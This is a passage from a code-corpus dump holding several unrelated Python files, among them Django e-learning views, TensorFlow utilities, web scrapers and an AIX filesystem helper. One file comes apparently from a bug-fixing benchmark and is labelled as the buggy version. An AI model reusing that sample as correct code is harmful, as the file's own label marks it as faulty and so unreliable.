word_ids, char_seqs, char_id_seqs), ner_tags, ner_ids)\n\n\nclass NERInstance(object):\n def __init__(self, sentence, ner_tags, ner_ids):\n self.sentence = sentence\n self.ner_tags = ner_tags\n self.ner_ids = ner_ids\n\n def length(self):\n return self.sentence.length()\n\n\nclass Sentence(object):\n def __init__(self, words, word_ids, char_seqs, char_id_seqs):\n self.words = words\n self.word_ids = word_ids\n self.char_seqs = char_seqs\n self.char_id_seqs = char_id_seqs\n\n def length(self):\n return len(self.words)\n","sub_path":"examples/sequence_tagging/conll_reader.py","file_name":"conll_reader.py","file_ext":"py","file_size_in_byte":6897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"408343357","text":"from classes.attribdict import AttribDict\n\nEQ_NO_POLICY = 0\nEQ_CASE_INSENSITIVE = 1\nEQ_INTEGER = 2\n\nclass EqualityPolicy(object):\n def __init__(self,policy):\n self.policy = AttribDict(policy)\n\n def of_attribute(self,attname):\n if attname in self.policy.keys():\n return self.policy[attname]\n else:\n if '*' in self.policy.keys():\n return self.policy['*']\n return EQ_NO_POLICY\n return\n\n def compare(self,a,b,attname):\n att_pol = self.of_attribute(attname)\n if att_pol == EQ_NO_POLICY:\n r = self.compare_no_policy(a,b)\n if att_pol == EQ_CASE_INSENSITIVE:\n lc_a = list()\n lc_b = list()\n for v in a:\n lc_a.append(v.lower())\n for v in b:\n lc_b.append(v.lower())\n r = self.compare_no_policy(lc_a,lc_b)\n if att_pol == EQ_INTEGER:\n i_a = list()\n i_b = list()\n for v in a:\n i_a.append(int(v))\n for v in b:\n i_b.append(int(v))\n r = self.compare_no_policy(i_a, i_b)\n\n return r\n\n def compare_no_policy(self,a,b):\n r = 1 if a > b else 0 if a == b else -1\n return r","sub_path":"classes/equalitypolicy.py","file_name":"equalitypolicy.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"195593036","text":"def create_fs(module, fs_type, filesystem, vg, device, size, mount_group, auto_mount, account_subsystem, permissions, nfs_server, attributes):\n ' Create LVM file system or NFS remote mount point. '\n attributes = ' -a '.join(attributes)\n account_subsys_opt = {\n True: '-t yes',\n False: '-t no',\n }\n if (nfs_server is not None):\n auto_mount_opt = {\n True: '-A',\n False: '-a',\n }\n else:\n auto_mount_opt = {\n True: '-A yes',\n False: '-A no',\n }\n if (size is None):\n size = ''\n else:\n size = ('-a size=%s' % size)\n if (device is None):\n device = ''\n else:\n device = ('-d %s' % device)\n if (vg is None):\n vg = ''\n else:\n (vg_state, msg) = _validate_vg(module, vg)\n if vg_state:\n vg = ('-g %s' % vg)\n else:\n changed = False\n return (changed, msg)\n if (mount_group is None):\n mount_group = ''\n else:\n mount_group = ('-u %s' % mount_group)\n auto_mount = auto_mount_opt[auto_mount]\n account_subsystem = account_subsys_opt[account_subsystem]\n if (nfs_server is not None):\n mknfsmnt_cmd = module.get_bin_path('mknfsmnt', True)\n if (not module.check_mode):\n (rc, mknfsmnt_out, err) = module.run_command(('%s -f \"%s\" %s -h \"%s\" -t \"%s\" \"%s\" -w \"bg\"' % (mknfsmnt_cmd, filesystem, device, nfs_server, permissions, auto_mount)))\n if (rc != 0):\n module.fail_json(msg='Failed to run mknfsmnt.', rc=rc, err=err)\n else:\n changed = True\n msg = ('NFS file system %s created.' % filesystem)\n return (changed, msg)\n else:\n changed = True\n msg = ''\n return (changed, msg)\n else:\n crfs_cmd = module.get_bin_path('crfs', True)\n if (not module.check_mode):\n (rc, crfs_out, err) = module.run_command(('%s -v %s -m %s %s %s %s %s %s -p %s %s -a %s' % (crfs_cmd, fs_type, filesystem, vg, device, mount_group, auto_mount, account_subsystem, permissions, size, attributes)))\n if (rc == 10):\n module.exit_json(msg=('Using a existent previously defined logical volume, volume group needs to be empty. %s' % err))\n elif (rc != 0):\n module.fail_json(msg='Failed to run crfs.', rc=rc, err=err)\n else:\n changed = True\n return (changed, crfs_out)\n else:\n changed = True\n msg = ''\n return (changed, msg)","sub_path":"Data Set/bug-fixing-3/75724bb7cabcdd78eed0ee3435b056e75db315ee--bug.py","file_name":"75724bb7cabcdd78eed0ee3435b056e75db315ee--bug.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"643462963","text":"def main():\n lst = []\n n = int(input())\n for i in range(n):\n l = [input(), float(input())]\n lst.append(l)\n\n grades = {}\n\n for i in lst:\n grades[i[0]] = i[1]\n\n marks = set((grades.values()))\n sorted_marks = sorted(marks)\n\n second_lowest_mark = sorted_marks[1]\n\n final_student_list = []\n\n for i in lst:\n if second_lowest_mark == i[1]: # i[1] represents only marks in list of lists\n final_student_list.append(i[0]) # i[0] represents only names in the list of lists\n\n for i in final_student_list:\n print(i)\n\nif __name__ == '__main__':\n main()","sub_path":"nested_2nd_lowest.py","file_name":"nested_2nd_lowest.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"239003330","text":"import unittest\nimport numpy as np\nfrom Layers.BatchNorm1D import BatchNorm1D\n\n\nclass BatchNormValueTest(unittest.TestCase):\n def test_output_value(self):\n for batch_size in range(2, 10):\n for input_length in range(1, 20):\n beta = np.random.randn(input_length, 1)\n eps = np.random.rand(input_length, 1)\n input_data = np.random.randn(batch_size, input_length, 1)\n test_layer = BatchNorm1D(input_length=input_length, batch_size=batch_size, beta=beta, eps=eps)\n output_data = test_layer.forward(input_data)\n output_mean = np.mean(output_data, axis=0)\n # Check the value of variance\n self.assertTrue(np.allclose(np.var(output_data, axis=0), np.var(input_data, axis=0) / (\n np.var(input_data, axis=0) + test_layer._eps)))\n # Check the mean of the output\n self.assertTrue(np.allclose(output_mean, test_layer._beta))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Layers/unit_test/test_BatchNorm.py","file_name":"test_BatchNorm.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"38772882","text":"from libs.effects.effect import Effect # pylint: disable=E0611, E0401\n\nimport numpy as np\n\n\nclass EffectBubble(Effect):\n def run(self):\n # Get the config of the current effect.\n effect_config = self.get_effect_config(\"effect_bubble\")\n led_count = self._device.device_config[\"led_count\"]\n led_mid = self._device.device_config[\"led_mid\"]\n\n # Translate the true and false to a number, for the function use.\n current_reverse_translated = 0\n if effect_config[\"reverse\"]:\n current_reverse_translated = -1\n else:\n current_reverse_translated = 1\n\n full_bubble_ref = self._color_service.full_bubble\n\n # Build an array with the currently selected gradient.\n # Cut the slide to the led count length.\n output_array = np.array(\n [\n full_bubble_ref[effect_config[\"gradient\"]][0][:led_count],\n full_bubble_ref[effect_config[\"gradient\"]][1][:led_count],\n full_bubble_ref[effect_config[\"gradient\"]][2][:led_count]\n ]\n )\n\n # Calculate how many steps the array will roll.\n steps = self.get_roll_steps(effect_config[\"speed\"])\n\n # We got the current output array. Now we prepare the next step. We \"roll\" the array with the specified speed.\n full_bubble_ref[effect_config[\"gradient\"]] = np.roll(\n full_bubble_ref[effect_config[\"gradient\"]],\n steps * current_reverse_translated,\n axis=1\n )\n\n if effect_config[\"mirror\"]:\n output_array = self.mirror_array(output_array, led_mid, led_count)\n\n # Add the output array to the queue.\n self.queue_output_array_blocking(output_array)\n","sub_path":"server/libs/effects/effect_bubble.py","file_name":"effect_bubble.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"180493581","text":"\"\"\"\ncount up the total number of events in a set of TFRecord files\n\"\"\"\nfrom __future__ import print_function\nfrom six.moves import range\nimport tensorflow as tf\nimport logging\n\nimport mnvtf.utils as utils\n\nLOGGER = logging.getLogger(__name__)\nFLAGS = tf.app.flags.FLAGS\n\n\ntf.app.flags.DEFINE_string('data_dir', '/tmp/data',\n \"\"\"Directory where data is stored.\"\"\")\ntf.app.flags.DEFINE_string('file_root', 'mnv_data_',\n \"\"\"File basename.\"\"\")\ntf.app.flags.DEFINE_string('compression', '',\n \"\"\"pigz (zz) or gzip (gz).\"\"\")\ntf.app.flags.DEFINE_string('data_format', 'NHWC',\n \"\"\"Tensor packing structure.\"\"\")\ntf.app.flags.DEFINE_string('log_name', 'temp_log.txt',\n \"\"\"Logfile name.\"\"\")\ntf.app.flags.DEFINE_string('out_pattern', 'temp_out',\n \"\"\"Logfile name.\"\"\")\ntf.app.flags.DEFINE_string('tfrec_type', 'hadmultkineimgs',\n \"\"\"TFRecord file type.\"\"\")\ntf.app.flags.DEFINE_string('field', 'eventids',\n \"\"\"Recorded data field.\"\"\")\ntf.app.flags.DEFINE_integer('batch_size', 128,\n \"\"\"Batch size.\"\"\")\ntf.app.flags.DEFINE_integer('imgh', 127,\n \"\"\"Img height.\"\"\")\ntf.app.flags.DEFINE_integer('imgw_x', 50,\n \"\"\"X-view img width.\"\"\")\ntf.app.flags.DEFINE_integer('imgw_uv', 25,\n \"\"\"U/V-view img width.\"\"\")\ntf.app.flags.DEFINE_integer('img_depth', 2,\n \"\"\"Img depth.\"\"\")\ntf.app.flags.DEFINE_integer('n_planecodes', 67,\n \"\"\"Number of planecodes.\"\"\")\n\n\ndef read_all_field(datareader_dict, typ, tfrec_type, field):\n LOGGER.info('read all {} for {}...'.format(field, typ))\n out_file = FLAGS.out_pattern + typ + '_' + field + '.txt'\n tf.reset_default_graph()\n n_evt = 0\n\n with tf.Graph().as_default() as g:\n with tf.Session(graph=g) as sess:\n\n reader_class = utils.get_reader_class(tfrec_type)\n reader = reader_class(datareader_dict)\n # get an ordered dict\n X, U, V, eventids, targets = reader.batch_generator(num_epochs=1)\n\n sess.run(tf.local_variables_initializer())\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n try:\n with open(out_file, 'ab+') as f:\n for batch_num in range(1000000):\n vs = sess.run(eventids)\n n_evt += len(vs)\n for v in vs:\n f.write('{}\\n'.format(v))\n except tf.errors.OutOfRangeError:\n LOGGER.info('Reading stopped - queue is empty.')\n except Exception as e:\n LOGGER.info(e)\n finally:\n coord.request_stop()\n coord.join(threads)\n\n LOGGER.info('found {} {} events'.format(n_evt, typ))\n utils.gz_compress(out_file)\n\n return n_evt\n\n\ndef main(argv=None):\n logfilename = FLAGS.log_name\n logging.basicConfig(\n filename=logfilename, level=logging.INFO,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n )\n LOGGER.info(\"Starting...\")\n LOGGER.info(__file__)\n\n runpars_dict = utils.make_run_params_dict()\n train_list, valid_list, test_list = \\\n utils.get_trainvalidtest_file_lists(\n FLAGS.data_dir, FLAGS.file_root, FLAGS.compression\n )\n flist_dict = {}\n read_types_list = []\n if len(train_list) > 0:\n flist_dict['train'] = train_list\n read_types_list.append('train')\n if len(valid_list) > 0:\n flist_dict['valid'] = valid_list\n read_types_list.append('valid')\n if len(test_list) > 0:\n flist_dict['test'] = test_list\n read_types_list.append('test')\n\n def datareader_dict(filenames_list, name):\n img_shp = (FLAGS.imgh, FLAGS.imgw_x, FLAGS.imgw_uv, FLAGS.img_depth)\n dd = utils.make_data_reader_dict(\n filenames_list=filenames_list,\n batch_size=FLAGS.batch_size,\n name=name,\n compression=FLAGS.compression,\n img_shp=img_shp,\n data_format=FLAGS.data_format,\n n_planecodes=FLAGS.n_planecodes\n )\n return dd\n\n LOGGER.debug(' run_params_dict = {}'.format(repr(runpars_dict)))\n\n n_total = 0\n for typ in read_types_list:\n dd = datareader_dict(flist_dict[typ], typ)\n LOGGER.info(' data reader dict for {} = {}'.format(\n typ, repr(dd)\n ))\n n_total += read_all_field(dd, typ, FLAGS.tfrec_type, FLAGS.field)\n\n LOGGER.info('Total events = {}'.format(n_total))\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"tfrec_examiner_dset.py","file_name":"tfrec_examiner_dset.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"454664020","text":"import sys\nimport os\n\nscriptDir = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(os.path.join(scriptDir, \"..\", \"dspy\"))\nimport process_dsp_data\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Process all DSP data.\")\n parser.add_argument(\"-i\", \"--indir\", help=\"Data directory for input\", required=True)\n parser.add_argument(\n \"-o\", \"--outdir\", help=\"Output directory to save results\", required=True\n )\n parser.add_argument(\n \"-r\", \"--rerun\", help=\"Perform validation\", required=False, action=\"store_true\"\n )\n parser.add_argument(\n \"-s\",\n \"--scriptdir\",\n help=\"Directory where the scripts are for this\",\n required=False,\n )\n\n parser.add_argument(\n \"-p\",\n \"--skippdfs\",\n help=\"Whether to skip PDFs generation\",\n required=False,\n action=\"store_true\",\n )\n\n parser.set_defaults(scriptdir=scriptDir, val=False, skippdfs=False)\n\n args = vars(parser.parse_args())\n\n if args[\"skippdfs\"]:\n all_pdfs = False\n else:\n all_pdfs = True\n\n process_dsp_data.process_dsp_data(\n args[\"indir\"],\n args[\"outdir\"],\n args[\"rerun\"],\n args[\"scriptdir\"],\n all_pdfs,\n )\n","sub_path":"dspy/run_dspy.py","file_name":"run_dspy.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"160541879","text":"#!/usr/bin/python3\n\"\"\"\nDefine function that writes an Object to a text file, using a JSON\nrepresentation.\n\"\"\"\nimport json\n\n\ndef save_to_json_file(my_obj, filename):\n \"\"\"\n writes an Object to a text file, using a JSON representation.\n\n Args:\n my_obj(object): Python object to serielize.\n filename(str): File name to write the serialized object.\n Return:\n Nothing.\n \"\"\"\n if filename:\n with open(filename, mode='w', encoding='utf-8') as data:\n data.write(json.dumps(my_obj))\n","sub_path":"0x0B-python-input_output/7-save_to_json_file.py","file_name":"7-save_to_json_file.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"234815234","text":"from django.shortcuts import render, redirect, get_object_or_404, render_to_response\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import SignupForm\nfrom django.contrib.auth import logout\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.models import User\nimport hashlib, datetime, random\nimport hashlib\nimport json\nfrom .models import UserActivationKey, Course, CoursePart, QuizPart, CourseTaken, QuizTaken, QuizPartAnswer, UserProfile\nfrom django.core.mail import send_mail\nfrom django.utils import timezone\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.contrib import messages\nfrom .gmail import send_mail_gmail\n\n# Create your views here.\ndef home_view(request):\n return render(request, \"loglan/home.html\")\n\ndef about_view(request):\n return render(request, \"loglan/about.html\")\n\ndef help_view(request):\n return render(request, \"loglan/help.html\")\n\ndef signup_view(request):\n if request.method == 'POST':\n form = SignupForm(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.is_active = False\n user.save()\n\n username = form.cleaned_data['username']\n email = form.cleaned_data['email']\n\n activation_key = hashlib.sha224((email).encode('utf-16be')).hexdigest()\n key_expires = datetime.datetime.today() + datetime.timedelta(2)\n\n user=User.objects.get(username=username)\n user_activation_key = UserActivationKey(user=user, activation_key=activation_key, key_expires=key_expires)\n user_activation_key.save()\n\n user_profile = UserProfile(user=user)\n user_profile.save()\n\n host=request.META['HTTP_HOST']\n email_subject = 'Account confirmation'\n email_body = \"\"\"Hai {}, Terimakasih sudah mendaftar.\n\nSelamat datang di LogLan, web aplikasi e-learning berbasis metode gamification untuk belajar bahasa pemrograman Python yang menyenangkan dan menantang. Aplikasi ini dibuat untuk tujuan penelitian.\n\nUntuk aktifasi akun, silahkan kunjungi tautan dibawah ini dalam jangka waktu kurang dari 48 jam.\n\nhttp://{}/account/confirmation/{}\n\nJika mengklik tautan di atas tidak berhasil, silakan salin dan tempel URL di jendela browser baru.\n\n\nHormat Saya,\nMuhammad Nizar Yoga Pratama\"\"\".format(username, host, activation_key)\n\n from_email = settings.EMAIL_HOST_USER\n to_email = [user.email, settings.EMAIL_HOST_USER]\n\n send_mail(email_subject, email_body, from_email, to_email, fail_silently=False)\n # send_mail_gmail(email_subject, email_body, from_email, user.email)\n\n # return HttpResponseRedirect('/sign-up/succes')\n return render_to_response('loglan/signup_succes.html')\n\n else:\n form = SignupForm()\n\n return render(request, 'loglan/signup.html', {'form': form})\n\ndef account_confirmation_view(request, activation_key):\n if request.user.is_authenticated():\n return HttpResponseRedirect('/user-main-page')\n\n user_activation = get_object_or_404(UserActivationKey, activation_key=activation_key)\n if user_activation.key_expires < timezone.now():\n return render_to_response('loglan/account_expired.html')\n user = user_activation.user\n user.is_active = True\n user.save()\n return render_to_response('loglan/account_confirmed.html')\n\n# def account_confirmed_view():\n# return render(request, \"loglan/account_confirmed.html\")\n#\n# def account_expired_view():\n# return render(request, \"loglan/account_expired.html\")\n#\n# def signup_succes_view(request):\n# return render(request, \"loglan/signup_succes.html\")\n\n@login_required\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect('/login')\n\ndef ranking_view(request):\n context = {}\n user_profiles = UserProfile.objects.all()\n user_rankings = UserProfile.user_profile_manager.get_user_rangking()\n context['user_rankings'] = user_rankings\n return render(request, \"loglan/ranking.html\", context)\n\ndef user_main_page_view(request):\n context = {}\n course_taken = CourseTaken.objects.filter(user=request.user)\n context['course_taken']=course_taken\n return render(request, \"loglan/user_main_page.html\", context)\n\n\ndef choose_level_view(request):\n context = {}\n courses = Course.objects.all()\n context['courses']=courses\n return render(request, \"loglan/choose_level.html\", context )\n\n\ndef quiz_part_detail_view(request, course_slug, number_part_quiz):\n quiz_part = QuizPart.objects.get(number=number_part_quiz, quiz__course__course_slug = course_slug)\n\n quiz_taken, created = QuizTaken.objects.get_or_create(\n user=request.user,\n quiz=quiz_part.quiz\n )\n try:\n if number_part_quiz != '1' and (quiz_part.previous_quiz() != quiz_taken.last_taken_quiz()):\n if quiz_taken.last_taken_quiz():\n return HttpResponseRedirect('/quiz/{}/{}/'.format(course_slug, quiz_taken.last_taken_quiz().next_quiz().number))\n else:\n return HttpResponseRedirect('/quiz/{}/{}/'.format(course_slug, 1))\n else:\n if quiz_part in quiz_taken.quiz_part_is_completed.all():\n return HttpResponseRedirect('/quiz/{}/{}/'.format(course_slug, quiz_taken.last_taken_quiz().next_quiz().number))\n except:\n return HttpResponseRedirect('/quiz/{}/result'.format(course_slug))\n\n\n # kalau nomor quiz 1, quiz_part_is_true sama false harus dikosongin\n # if number_part_quiz == 1:\n\n if request.method == \"POST\":\n jawaban_id = int(request.POST.get(\"ChoiceAnswer\"))\n jawaban = QuizPartAnswer.objects.get(id=jawaban_id)\n print(jawaban_id)\n if quiz_part.quiz_answer_key.id == jawaban_id:\n quiz_taken.quiz_part_is_true.add(quiz_part)\n pass\n else:\n pass\n quiz_taken.quiz_part_is_false.add(quiz_part)\n quiz_taken.quiz_part_is_completed.add(quiz_part)\n if quiz_part.is_last_quiz_part():\n return HttpResponseRedirect('/quiz/{}/result'.format(course_slug))\n else:\n return HttpResponseRedirect('/quiz/{}/{}/'.format(course_slug, quiz_part.next_quiz().number))\n\n context = {}\n context['quiz_part'] = quiz_part\n return render(request, \"loglan/quiz_part_detail.html\", context)\n\ndef quiz_part_result_view(request, course_slug):\n quiz_taken, created = QuizTaken.objects.get_or_create(\n user=request.user,\n quiz__course__course_slug=course_slug\n )\n context = {'quiz_taken': quiz_taken}\n return render(request, \"loglan/quiz_part_result.html\", context )\n\ndef quiz_part_retake_view(request, course_slug):\n # context = {}\n # context [''] =\n quiz_taken, created = QuizTaken.objects.get_or_create(\n user=request.user,\n quiz__course__course_slug=course_slug\n )\n quiz_taken.quiz_part_is_true.clear()\n quiz_taken.quiz_part_is_false.clear()\n quiz_taken.quiz_part_is_completed.clear()\n\n return HttpResponseRedirect('/quiz/{}/{}/'.format(course_slug, 1))\n\n\ndef course_part_detail_view(request, course_slug, number_part_course):\n course = Course.objects.get(course_slug=course_slug)\n course_part = CoursePart.objects.get(number=number_part_course, course=course)\n\n # cek udah pernah belajar course ini apa belom\n course_taken, created = CourseTaken.objects.get_or_create(\n user=request.user,\n course=course_part.course\n )\n\n if number_part_course != '1' and (course_part.previous_part() not in course_taken.course_part.all()):\n if course_taken.last_taken_part():\n return HttpResponseRedirect('/course/{}/{}/'.format(course_slug, course_taken.last_taken_part().next_part().number))\n else:\n return HttpResponseRedirect('/course/{}/{}/'.format(course_slug, 1))\n\n context = {}\n context['course_part'] = course_part\n return render(request, \"loglan/course_part_detail.html\", context )\n\ndef course_part_list_view(request, course_slug):\n context = {}\n course = Course.objects.get(course_slug=course_slug)\n # cek udah pernah belajar course ini apa belom\n course_taken, created = CourseTaken.objects.get_or_create(\n user=request.user,\n course=course\n )\n\n if created:\n course_taken.course_part.add(course.course_parts.all()[0])\n\n context['course'] = course\n context['course_taken'] = course_taken\n return render(request, \"loglan/course_part_list.html\", context)\n\ndef course_part_result_view(request, course_slug):\n context = {}\n course = Course.objects.get(course_slug=course_slug)\n context['course'] = course\n return render(request, \"loglan/course_part_result.html\", context)\n\ndef cek_jawaban(request):\n if request.method == 'POST':\n kode_jawaban = request.POST.get('jawaban')\n console_user = request.POST.get('console_user')\n user_id = request.POST.get('user_id')\n course_part_id = request.POST.get('course_part_id')\n response_data = {}\n user = User.objects.get(id=int(user_id))\n soal = CoursePart.objects.get(id=int(course_part_id))\n\n print('soal.id', soal.id)\n print('soal.course_example_answer_key: ', soal.course_example_answer_key)\n kunci = soal.course_example_answer_key.replace(u'\\r',u'')\n kunci =u'{}\\n'.format(kunci)\n\n print('kode_jawaban: ', kode_jawaban)\n print('kunci: ', kunci)\n if kunci == kode_jawaban:\n hasil_jawaban = \"Kode program Anda benar\"\n course_taken = CourseTaken.objects.get(user=request.user, course=soal.course)\n course_taken.course_part.add(soal)\n if soal.is_last_course_part():\n course_taken.is_done = True\n course_taken.save()\n\n else:\n hasil_jawaban = \"Kode program Anda salah\"\n\n response_data['hasil_jawaban'] = hasil_jawaban\n response_data['jawaban_html'] = kode_jawaban\n print(response_data)\n return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\n else:\n return HttpResponse(json.dumps({\"nothing to see\": \"this isn't happening\"}), content_type=\"application/json\")\n","sub_path":"loglan/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"595932999","text":"import melee\nimport globals\nfrom melee.enums import Action, Button\nfrom enum import Enum\n\nclass SMASH_DIRECTION(Enum):\n UP = 0\n DOWN = 1\n FORWARD = 2\n\nclass SmashAttack():\n def __init__(self, charge=0, direction=SMASH_DIRECTION.UP):\n self.charge = charge\n self.direction = direction\n self.frames_charged = 0\n\n def step(self):\n smashbot_state = globals.smashbot_state\n controller = globals.controller\n\n if smashbot_state.action == Action.LANDING_SPECIAL:\n self.interruptible = True\n controller.empty_input()\n return\n\n # Do we need to jump cancel?\n jumpcancelactions = [Action.SHIELD, Action.SHIELD_RELEASE, Action.DASHING, Action.RUNNING]\n if smashbot_state.action in jumpcancelactions:\n self.interruptible = False\n controller.press_button(Button.BUTTON_Y);\n return\n\n if smashbot_state.action in [Action.FSMASH_MID, Action.UPSMASH, Action.DOWNSMASH]:\n # Are we in the early stages of the smash and need to charge?\n if self.frames_charged < self.charge:\n self.interruptible = False\n self.frames_charged += 1\n controller.press_button(Button.BUTTON_A);\n return\n # Are we done with a smash and just need to quit?\n else:\n self.interruptible = True\n controller.empty_input()\n return\n\n # Do the smash, unless we were already pressing A\n if controller.prev.button[Button.BUTTON_A]:\n controller.empty_input()\n self.interruptible = True\n return\n\n self.interruptible = False\n controller.press_button(Button.BUTTON_A);\n if self.direction == SMASH_DIRECTION.UP:\n controller.tilt_analog(Button.BUTTON_MAIN, .5, 1)\n elif self.direction == SMASH_DIRECTION.DOWN:\n controller.tilt_analog(Button.BUTTON_MAIN, .5, 0)\n elif self.direction == SMASH_DIRECTION.FORWARD:\n controller.tilt_analog(Button.BUTTON_MAIN, int(smashbot_state.facing), .5)\n","sub_path":"Chains/smashattack.py","file_name":"smashattack.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"253848736","text":"import pymongo\nimport requests\nimport json\nfrom lxml.html import fromstring\nfrom bs4 import BeautifulSoup as bs\nfrom itertools import cycle\nimport traceback\n\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\nmydb = myclient[\"archimaterie\"]\nmycol = mydb[\"active\"]\n\ndef getproxies():\n url = 'https://free-proxy-list.net/'\n response = requests.get(url)\n parser = fromstring(response.text)\n proxies = set()\n for i in parser.xpath('//tbody/tr')[:1000]:\n if i.xpath('.//td[7][contains(text(),\"yes\")]'):\n # Grabbing IP and corresponding PORT\n proxy = \":\".join([i.xpath('.//td[1]/text()')[0],\n i.xpath('.//td[2]/text()')[0]])\n proxies.add(proxy)\n return proxies\n\nproxies = getproxies()\n\n\ndef genurl(company):\n return \"https://www.startpage.com/do/dsearch?query=\" + company\n\ndef soupmaker(url):\n s = request.get(url)\n return bs(s.text, features=\"lxml\")\n\ndef alllinks(soup):\n links = {}\n anon = {}\n i = 0\n j = 0\n for link in website_data.find_all('a'):\n if \"proxy\" in link.get('href'):\n anon[\"link%d\" % i] = \"\\\"\" + str(link.get('href')) + \"\\\"\"\n j += 1\n else:\n i += 1\n if i > 14:\n links[\"link%d\" % i] = \"\\\"\" + str(link.get('href')) + \"\\\"\"\n yield links, anon\n\ndef updatedoc(doc, links):\n var = json.dumps(links, indent=4)\n linksjson = json.loads(var)\n mycol.update_one(doc, {\"$push\": linksjson })\n\n\ndef main():\n for doc in mycol.find():\n updatedoc(doc, alllinks(soupmaker(genurl(str(doc['name']))))[0])\n \n","sub_path":"refactor.py","file_name":"refactor.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"251522428","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 20 14:24:16 2019\n\n@author: bangde\n\"\"\"\n\n#百思不得其姐,多线程\n#xpath表达式://div[@class=\"j-r-list-c-desc\"]/a/text()\nimport requests\nfrom lxml import etree\nfrom queue import Queue\nimport threading\nimport time\n\nclass bsSpider:\n def __init__(self):\n self.baseurl = \"http://www.budejie.com/\"\n self.headers = {\"User-Agent\":\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)\"}\n #URL队列\n self.urlQueue = Queue()\n #响应html队列\n self.resQueue = Queue()\n \n \n #生成URL队列\n def getUrl(self):\n for pNum in range(1,11):\n url = self.baseurl + str(pNum)\n self.urlQueue.put(url)\n \n #请求,得到响应html,放到解析队列\n def getHtml(self):\n while True:\n #1.从url队列中get值\n url = self.urlQueue.get()\n #2.发请求,得响应,put到响应队列\n res = requests.get(url,headers=self.headers)\n res.encoding=\"utf-8\"\n html=res.text\n #放到响应队列\n self.resQueue.put(html)\n #清除此任务\n self.urlQueue.task_done()\n \n #解析页面方法\n def getText(self):\n while True:\n html = self.resQueue.get()\n parseHtml = etree.HTML(html)\n r_list=parseHtml.xpath('//div[@class=\"j-r-list-c-desc\"]/a/text()')\n for r in r_list:\n print(r+\"\\n\")\n #清除任务\n self.resQueue.task_done()\n \n def run(self):\n #空列表,用来存放所有线程\n thlist = []\n #生成URL队列\n self.getUrl()\n #创建请求线程,放到列表中\n for i in range(3):\n thRes = threading.Thread(target=self.getHtml)\n thlist.append(thRes)\n \n #创建解析线程,放到列表中\n for i in range(3):\n thparse = threading.Thread(target=self.getText)\n thlist.append(thparse)\n \n #所有线程开始执行\n for th in thlist:\n th.setDaemon(True)\n th.start()\n \n #如果队列为空,则执行其它程序\n self.urlQueue.join()\n self.resQueue.join()\n\nif __name__==\"__main__\":\n begin = time.time()\n spider = bsSpider()\n spider.run()\n end = time.time()\n print(end-begin)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"linux/language/python/code/spider/spider26_thread.py","file_name":"spider26_thread.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"614642957","text":"# Copyright 2014 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom alembic.util import CommandError\nfrom flask import json\nimport flask_migrate\nimport os\nfrom unittest2.case import TestCase\n\nfrom collector.api.app import app\nfrom collector.api.app import db\nfrom collector.api.log import init_logger\n\n\nflask_migrate.Migrate(app, db)\n\n# Configuring app for the test environment\napp.config.from_object('collector.api.config.Testing')\napp.config.from_envvar('COLLECTOR_SETTINGS', silent=True)\ninit_logger()\n\n\nclass BaseTest(TestCase):\n\n def 